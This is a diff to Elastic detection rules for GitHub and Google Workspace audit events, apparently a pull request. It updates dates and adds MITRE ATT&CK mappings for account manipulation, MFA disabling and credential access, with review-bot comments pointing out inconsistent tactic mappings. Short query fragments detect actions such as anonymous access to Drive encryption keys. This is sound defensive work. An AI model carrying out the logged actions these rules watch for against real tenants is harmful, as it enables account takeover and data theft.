+[[rule.threat.technique.subtechnique]]
+id = "T1098.003"
+name = "Additional Cloud Roles"
+reference = "https://attack.mitre.org/techniques/T1098/003/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/integrations/github/persistence_new_pat_created.toml b/rules/integrations/github/persistence_new_pat_created.toml
index ff972644a35..ca627a7c411 100644
--- a/rules/integrations/github/persistence_new_pat_created.toml
+++ b/rules/integrations/github/persistence_new_pat_created.toml
@@ -2,7 +2,7 @@ creation_date = "2023/12/16"
 integration = ["github"]
 maturity = "production"
-updated_date = "2026/01/12"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -72,6 +72,16 @@ github.category == "personal_access_token" and event.action == "personal_access_
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1098.001"
+name = "Additional Cloud Credentials"
+reference = "https://attack.mitre.org/techniques/T1098/001/"
+
 [[rule.threat.technique]]
 id = "T1136"
 name = "Create Account"
diff --git a/rules/integrations/github/persistence_organization_owner_role_granted.toml b/rules/integrations/github/persistence_organization_owner_role_granted.toml
index c8b2b1f0fc5..b4352967199 100644
--- a/rules/integrations/github/persistence_organization_owner_role_granted.toml
+++ b/rules/integrations/github/persistence_organization_owner_role_granted.toml
@@ -2,7 +2,7 @@ creation_date = "2023/09/11"
 integration = ["github"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -70,19 +70,36 @@ iam where event.dataset == "github.audit" and event.action == "org.update_member
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1098.003"
 name = "Additional Cloud Roles"
 reference = "https://attack.mitre.org/techniques/T1098/003/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1098.003"
+name = "Additional Cloud Roles"
+reference = "https://attack.mitre.org/techniques/T1098/003/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml b/rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml
index 8b50df9d34a..7cab15de693 100644
--- a/rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml
+++ b/rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml
@@ -2,7 +2,7 @@ creation_date = "2022/08/24"
 integration = ["google_workspace"]
 maturity = "production"
-updated_date = "2024/09/23"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -101,19 +101,31 @@ event.dataset:"google_workspace.admin" and event.action:"CREATE_DATA_TRANSFER_RE
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1074"
 name = "Data Staged"
 reference = "https://attack.mitre.org/techniques/T1074/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1074.002"
 name = "Remote Data Staging"
 reference = "https://attack.mitre.org/techniques/T1074/002/"
-
-
 [rule.threat.tactic]
 id = "TA0009"
 name = "Collection"
 reference = "https://attack.mitre.org/tactics/TA0009/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1537"
+name = "Transfer Data to Cloud Account"
+reference = "https://attack.mitre.org/techniques/T1537/"
+
+[rule.threat.tactic]
+id = "TA0010"
+name = "Exfiltration"
+reference = "https://attack.mitre.org/tactics/TA0010/"
diff --git a/rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml b/rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml
index 36138972133..464366aa8c5 100644
--- a/rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml
+++ b/rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml
@@ -2,7 +2,7 @@ creation_date = "2023/03/21"
 integration = ["google_workspace"]
 maturity = "production"
-updated_date = "2025/01/15"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -102,19 +102,31 @@ file where event.dataset == "google_workspace.drive" and event.action : ("copy",
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1552"
 name = "Unsecured Credentials"
 reference = "https://attack.mitre.org/techniques/T1552/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1552.004"
 name = "Private Keys"
 reference = "https://attack.mitre.org/techniques/T1552/004/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1530"
+name = "Data from Cloud Storage"
+reference = "https://attack.mitre.org/techniques/T1530/"
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
diff --git a/rules/integrations/google_workspace/defense_evasion_application_removed_from_blocklist_in_google_workspace.toml b/rules/integrations/google_workspace/defense_evasion_application_removed_from_blocklist_in_google_workspace.toml
index ba8f4a4f7f8..6306e9be4c1 100644
--- a/rules/integrations/google_workspace/defense_evasion_application_removed_from_blocklist_in_google_workspace.toml
+++ b/rules/integrations/google_workspace/defense_evasion_application_removed_from_blocklist_in_google_workspace.toml
@@ -2,7 +2,7 @@ creation_date = "2022/08/25"
 integration = ["google_workspace"]
 maturity = "production"
-updated_date = "2024/09/23"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -107,19 +107,23 @@ event.dataset:"google_workspace.admin" and event.category:"iam" and event.type:"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1484"
+name = "Domain or Tenant Policy Modification"
+reference = "https://attack.mitre.org/techniques/T1484/"
+
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1562.001"
 name = "Disable or Modify Tools"
 reference = "https://attack.mitre.org/techniques/T1562/001/"
-
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/integrations/google_workspace/defense_evasion_domain_added_to_google_workspace_trusted_domains.toml b/rules/integrations/google_workspace/defense_evasion_domain_added_to_google_workspace_trusted_domains.toml
index 50b9fd776ed..987573a3585 100644
--- a/rules/integrations/google_workspace/defense_evasion_domain_added_to_google_workspace_trusted_domains.toml
+++ b/rules/integrations/google_workspace/defense_evasion_domain_added_to_google_workspace_trusted_domains.toml
@@ -2,7 +2,7 @@ creation_date = "2020/11/17"
 integration = ["google_workspace"]
 maturity = "production"
-updated_date = "2024/09/23"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -99,19 +99,28 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1484"
+name = "Domain or Tenant Policy Modification"
+reference = "https://attack.mitre.org/techniques/T1484/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1484.002"
+name = "Trust Modification"
+reference = "https://attack.mitre.org/techniques/T1484/002/"
+
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1562.007"
 name = "Disable or Modify Cloud Firewall"
 reference = "https://attack.mitre.org/techniques/T1562/007/"
-
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/integrations/google_workspace/defense_evasion_google_workspace_bitlocker_setting_disabled.toml b/rules/integrations/google_workspace/defense_evasion_google_workspace_bitlocker_setting_disabled.toml
index 3da71e49a09..c6a45f868a9 100644
--- a/rules/integrations/google_workspace/defense_evasion_google_workspace_bitlocker_setting_disabled.toml
+++ b/rules/integrations/google_workspace/defense_evasion_google_workspace_bitlocker_setting_disabled.toml
@@ -2,7 +2,7 @@ creation_date = "2022/09/06"
 integration = ["google_workspace"]
 maturity = "production"
-updated_date = "2024/09/23"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -100,19 +100,23 @@ event.dataset:"google_workspace.admin" and event.action:"CHANGE_APPLICATION_SETT
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1484"
+name = "Domain or Tenant Policy Modification"
+reference = "https://attack.mitre.org/techniques/T1484/"
+
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1562.001"
 name = "Disable or Modify Tools"
 reference = "https://attack.mitre.org/techniques/T1562/001/"
-
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/integrations/google_workspace/defense_evasion_google_workspace_new_oauth_login_from_third_party_application.toml b/rules/integrations/google_workspace/defense_evasion_google_workspace_new_oauth_login_from_third_party_application.toml
index dbe8480ee6b..625a14b96ce 100644
--- a/rules/integrations/google_workspace/defense_evasion_google_workspace_new_oauth_login_from_third_party_application.toml
+++ b/rules/integrations/google_workspace/defense_evasion_google_workspace_new_oauth_login_from_third_party_application.toml
@@ -2,7 +2,7 @@ creation_date = "2023/03/30"
 integration = ["google_workspace"]
 maturity = "production"
-updated_date = "2025/02/19"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -90,39 +90,57 @@ google_workspace.token.scope.data: *Login and google_workspace.token.client.id: [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["google_workspace.token.client.id"] diff --git a/rules/integrations/google_workspace/defense_evasion_restrictions_for_marketplace_modified_to_allow_any_app.toml b/rules/integrations/google_workspace/defense_evasion_restrictions_for_marketplace_modified_to_allow_any_app.toml index 09ecde61c16..2b52d566d85 100644 --- a/rules/integrations/google_workspace/defense_evasion_restrictions_for_marketplace_modified_to_allow_any_app.toml 
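Review bot: A new Persistence (TA0003) tactic block is added to `defense_evasion_google_workspace_new_oauth_login_from_third_party_application.toml`, but this file's diff has only two hunks (`updated_date` and this threat block), so the rule's `tags` are untouched and `Tactic: Persistence` is present only if it already was. The repository convention is that every `rule.threat` tactic is mirrored by a `Tactic: <name>` tag, so this is worth confirming before merge. The same applies to every later hunk in this series that introduces a new `[rule.threat.tactic]` — the google_workspace `impact_`, `initial_access_` and `persistence_` files and the kubernetes `discovery_`, `execution_` and `initial_access_` files — none of which touches `tags`. If the tags were updated in a separate commit, a line in the commit message saying so would save reviewers the check.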
+++ b/rules/integrations/google_workspace/defense_evasion_restrictions_for_marketplace_modified_to_allow_any_app.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/25" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -108,19 +108,23 @@ event.dataset:"google_workspace.admin" and event.action:"CHANGE_APPLICATION_SETT [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/google_workspace/impact_google_workspace_admin_role_deletion.toml b/rules/integrations/google_workspace/impact_google_workspace_admin_role_deletion.toml index b55c2591321..6ca7e8646d2 100644 --- a/rules/integrations/google_workspace/impact_google_workspace_admin_role_deletion.toml +++ b/rules/integrations/google_workspace/impact_google_workspace_admin_role_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -99,14 +99,26 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1531" name = "Account Access Removal" reference = "https://attack.mitre.org/techniques/T1531/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml b/rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml index 5c62a0f8be1..25db102037c 100644 --- a/rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml +++ b/rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -103,14 +103,49 @@ event.dataset:google_workspace.admin and event.provider:admin [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1531" name = "Account Access Removal" reference = "https://attack.mitre.org/techniques/T1531/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml b/rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml index 9da5f09028e..9ae1d29e3c6 100644 --- a/rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml +++ b/rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/16" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
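Review bot: T1556.006 is mapped here to Credential Access (TA0006) and Defense Evasion (TA0005), while the other two MFA/2SV rules in this series map the same technique differently — `persistence_google_workspace_2sv_policy_disabled.toml` gets Persistence, Credential Access and Defense Evasion, and `persistence_mfa_disabled_for_google_workspace_organization.toml` gets Persistence and Defense Evasion only. The ATT&CK tactic set for T1556 is the same in all three cases, so the three rules should probably receive the same set, or the difference should be explained in each rule's `note`. Aligning them also keeps the `Tactic: ` tags of the three rules consistent with each other.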
@@ -104,19 +104,31 @@ iam where event.dataset == "google_workspace.admin" and event.action == "ADD_GRO [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml b/rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml index e3a60da3cd3..1b4990aa49c 100644 --- a/rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml +++ b/rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -94,19 +94,41 @@ event.dataset:google_workspace.admin and event.category:iam and event.action:UNS [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml b/rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml index 46a1d328e83..afa271c9bad 100644 --- a/rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml +++ b/rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/07" integration = ["google_workspace"] maturity = "production" -updated_date = "2025/02/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -116,19 +116,54 @@ sequence by source.user.email with maxspan=3m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.001" +name = "Malicious Link" +reference = "https://attack.mitre.org/techniques/T1204/001/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/google_workspace/persistence_application_added_to_google_workspace_domain.toml b/rules/integrations/google_workspace/persistence_application_added_to_google_workspace_domain.toml index 90cf5ef9b6e..88bf490d5ac 100644 --- a/rules/integrations/google_workspace/persistence_application_added_to_google_workspace_domain.toml +++ b/rules/integrations/google_workspace/persistence_application_added_to_google_workspace_domain.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -104,8 +104,17 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml b/rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml index 4647fb4aed4..5e354b05b51 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/26" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -103,14 +103,39 @@ event.dataset:"google_workspace.login" and event.action:"2sv_disable" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/google_workspace/persistence_google_workspace_admin_role_assigned_to_user.toml b/rules/integrations/google_workspace/persistence_google_workspace_admin_role_assigned_to_user.toml index a23661911b2..6d63f4458ff 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_admin_role_assigned_to_user.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_admin_role_assigned_to_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -107,19 +107,36 @@ event.dataset:"google_workspace.admin" and event.category:"iam" and event.action [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/google_workspace/persistence_google_workspace_api_access_granted_via_dwd.toml b/rules/integrations/google_workspace/persistence_google_workspace_api_access_granted_via_dwd.toml index 2a59b14eadc..0783b41bddd 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_api_access_granted_via_dwd.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_api_access_granted_via_dwd.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/12" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
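Review bot: Privilege Escalation (TA0004) is added here for T1098.003, and likewise for the other google_workspace role rules later in the series (`persistence_google_workspace_api_access_granted_via_dwd.toml`, `persistence_google_workspace_custom_admin_role_created.toml`, `persistence_google_workspace_role_modified.toml`, `persistence_google_workspace_user_organizational_unit_changed.toml`), yet the kubernetes `persistence_cluster_admin_rolebinding_created.toml` hunk removes exactly that tactic for T1098.006. Binding cluster-admin is at least as much a privilege-escalation step as assigning a Workspace admin role, so the two directions look inconsistent and one of them is probably unintended. If the removal is deliberate, a sentence in the commit message stating the policy would stop the mapping from being re-added later.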
@@ -104,14 +104,26 @@ event.dataset:google_workspace.admin [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/google_workspace/persistence_google_workspace_custom_admin_role_created.toml b/rules/integrations/google_workspace/persistence_google_workspace_custom_admin_role_created.toml index 643c9d27e06..6ccf74de94f 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_custom_admin_role_created.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_custom_admin_role_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -104,14 +104,36 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml b/rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml index 986aac4bd3d..479e37fcf31 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
